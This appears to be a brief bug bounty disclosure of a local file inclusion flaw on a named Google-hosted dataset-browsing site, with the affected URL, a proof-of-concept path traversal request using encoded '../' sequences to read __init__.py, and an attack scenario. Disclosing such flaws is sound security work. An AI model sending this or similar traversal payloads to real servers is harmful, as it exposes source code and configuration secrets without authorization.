Summary:
LFI in knowyourdata-tfds.withgoogle.com
Product:
knowyourdata-tfds.withgoogle.com
URL:
https://knowyourdata-tfds.withgoogle.com/assets/onboarding/
Vulnerability type:
File Inclusion
Details
POC:-
https://knowyourdata-tfds.withgoogle.com/assets/onboarding//..%2f..%2f..%2f..%2f..%2f..%2f__init__.py
Attack scenario
An attacker could read local files on the web server that they would normally not have access to, such as the application source code or configuration files containing sensitive information on how the website is configured.